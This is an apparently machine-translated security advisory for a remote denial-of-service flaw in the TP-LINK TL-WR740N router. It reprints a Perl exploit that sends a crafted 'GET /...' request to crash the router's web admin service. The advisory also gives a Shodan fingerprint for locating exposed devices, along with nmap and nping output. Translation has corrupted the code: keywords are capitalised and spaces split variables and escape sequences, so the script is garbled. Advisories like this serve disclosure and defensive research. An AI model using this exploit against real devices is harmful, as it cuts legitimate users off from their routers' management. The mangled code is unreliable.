TP-LINK TL-WR740N router Denial of Service Vulnerability

Release date: 2013-03-21
Updated on: 2013-03-22

Affected Systems:
TP-LINK TL-WR740N v4.23
Description:
--------------------------------------------------------------------------------
Bugtraq id: 58623
 
The TL-WR740N is a Mbps wireless router.
 
TL-WR740N 3.16.4 Build 130205 Rel.63875n vro has a remote denial of service vulnerability in implementation. If the Web server (httpd) does not process http get requests on the default TCP port 80, the attacker sends a series of three points (...) to the vro, the httpd will crash and the user will not be able to access the management interface of the management control panel. After the router is restarted, it can work normally.
 
<* Source: Gjoko Krstic (liquidworm@gmail.com)
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/local/bin/perl
#
#
# TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit
#
#
# Vendor: TP-LINK Technologies Co., Ltd.
# Product web page: http://www.tp-link.us
#
# Affected version:
#
#-Firmware version: 3.16.4 Build 130205 Rel.63875n (Released:
2/5/2013)
#-Hardware version: WR740N v4 00000000 (v4.23)
#-Model No. TL-WR740N/TL-WR740ND
#
# Summary: The TL-WR740N is a combined wired/wireless network connection
# Device integrated with internet-sharing router and 4-port switch.
# Wireless N Router is 802.11b & g compatible based on 802.11n technology
# And gives you 802.11n performance up to 150 Mbps at an even more
Affordable
# Price. Bordering on 11n and surpassing 11g speed enables high
Bandwidth
# Consuming applications like video streaming to be more fluid.
#
# Desc: The TP-Link WR740N Wireless N Router network device is exposed
To
# Remote denial of service vulnerability when processing a HTTP request.
This
# Issue occurs when the web server (httpd) fails to handle a HTTP GET
Request
# Over a given default TCP port 80. Sending a sequence of three dots
(...)
# The router will crash its httpd service denying the legitimate users
Access
# To the admin control panel management interface. To bring back
Http srv
# And the admin UI, a user must physically reboot the router.
#
#
#================================ Playground:
====================================
#
# Shodan: WWW-Authenticate: Basic realm = "TP-LINK Wireless Lite N Router
WR740N"
#
# Nmap-sV 192.168.0.1
#
# Starting Nmap 6.01 (http://nmap.org) at 2013-03-19 Central
European Standard Time
# Nmap scan report for 192.168.0.1
# Host is up (0.00 s latency ).
# Not shown: 999 closed ports
# PORT STATE SERVICE VERSION
#80/tcp openhttp TP-LINK WR740N WAP http config
# MAC Address: AA: BB: CC: DD: EE: FF (Tp-link Technologies CO .)
# Service Info: Device: WAP
#
# Service detection completed MED. Please report any incorrect results
Http://nmap.org/submit.
# Nmap done: 1 IP address (1 host up) scanned in 12.42 seconds
#
#
--------------------------------------------------------------------------
# Changed Probe Directive in nmap-service-probes file [4 d range]:
#-Line: 4682: Probe TCP GetRequest q | GET/HTTP/1.0 \ r \ n |
# + Line: 4682: Probe TCP GetRequest q | GET/... HTTP/1.0 \ r \ n |
#
--------------------------------------------------------------------------
#
# Nping-c1 -- tcp-p80 192.168.0.1 -- data
"474554202f2e2e20485454502f312e310d0a0d0a"
#
# Starting Nping 0.6.01 (http://nmap.org/nping) at 2013-03-19
Central European Standard Time
# SENT (0.0920 s) TCP 192.168.0.101: 19835> 192.168.0.1: 80 S ttl = 64
Id = 21796 iplen = 61 seq = 1961954057 win = 1480
# RCVD (0.1220 s) TCP 192.168.0.1: 80 & gt; 192.168.0.101: 19835 RA ttl = 64 id = 0
Iplen = 40 seq = 0 win = 0
#
# Max rtt: 0.000 ms | Min rtt: 0.000 ms | Avg rtt: 0.000 ms
# Raw packets sent: 1 (75B) | Rcvd: 1 (46B) | Lost: 0 (0.00%)
# Tx time: 0.04000 s | Tx bytes/s: 1875.00 | Tx pkts/s: 25.00
# Rx time: 1.04000 s | Rx bytes/s: 44.23 | Rx pkts/s: 0.96
# Nping done: 1 IP address pinged in 1.12 seconds
#
#
--------------------------------------------------------------------------
#
# Nmap-Pn 192.168.0.1-p80
#
# Starting Nmap 6.01 (http://nmap.org) at 2013-03-19 Central
European Standard Time
# Nmap scan report for 192.168.0.1
# Host is up (0.00 s latency ).
# PORT STATE SERVICE
#80/tcp closed http
# MAC Address: AA: BB: CC: DD: EE: FF (Tp-link Technologies CO .)
#
# Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
#
#===================================! Playground
====================================
#
#
# Tested on: Router Webserver
#
#
# Vulnerability discovered by Gjoko 'liquidworm' Krstic
#
# Copyleft (c) 2013, Zero Science Lab
# Macedonian Information Security Research And Development Laboratory
# Http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2013-5135
# Advisory URL:
Http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5135.php
#
#
#172.163.2013
#
 
Use IO: Socket;
 
$ Ip = "$ ARGV [0]"; $ port = "$ ARGV [1]";
 
Print "\ n \ x20". "\ x1f" x42. "\ n ";
Print "\ x20 \ x1f". "\ x20" x40. "\ x1f \ n ";
Print "\ x20 \ x1f TP-Link TL-WR740N httpd DoS Exploit \ x1f \ n ";
Print "\ x20 \ x1f". "\ x20" x40. "\ x1f \ n ";
Print "\ x20 \ x1f". "\ x20" x7. "\ x16" x5. "\ x20" x15. "\ x16" x5. "\ x20" x8
. "\ X1f \ n ";
Print "\ x20 \ x1f ". "\ x20" x9. "\ x16 ". "\ x20" x19. "\ x16 ". "\ x20" x10. "\ x1f \ n ";
Print "\ x20". "\ x1f" x42. "\ n ";
Print "\ x20 \ x4". "\ x20" x40. "\ x4 \ n ";
Print "\ x20". "\ x1e" x 42. "\ n ";
 
If ($ # ARGV <1)
{
Print "\ n \ x20 \ x20 \ x1a \ x20Usage: $0 <ip> <port> \ n ";
Exit ();
}
 
$ Socket = IO: Socket: INET-> new (
Proto => "tcp ",
PeerAddr => $ ip,
PeerPort => $ port
);
 
$ Ta4ke = "\ x47 \ x45 \ x54 \ x20 ".
"\ X2f \ x2e \ x2e \ x2e ".
"\ X20 \ x48 \ x54 \ x54 ".
"\ X50 \ x2f \ x31 \ x2e ".
"\ X31 \ x0d \ x0a \ x0d ".
"\ X0a ";
 
Print "\ n \ x20 \ x1a \ x20Sending edevil payload... \ n"; sleep 2;
Print $ socket "$ ta4ke"; sleep 5; close $ socket;
Print "\ x20 \ x1a \ x20HTTPd successfully poked. \ n"; sleep 2;
Print "\ x20 \ x1a \ x20Verifying with Nmap... \ n"; sleep 2;
System ("nmap-Pn $ ip-p $ port ");
Print "\ n \ x20 \ x1a \ x20Playing goa-psy... \ n"; sleep 2;
System ("start C :\\ Progra ~ 1 \ Winamp \ winamp.exe
Http://wwww.example.com/stream/1008 ");
Sleep 1; print "\ x20 \ x1a \ x20All Done! \ N "; sleep 1;
 
# Codename: Threetwoees

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
TP-LINK
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://www.tp-link.com.au/products/details? Model = TL-WR740N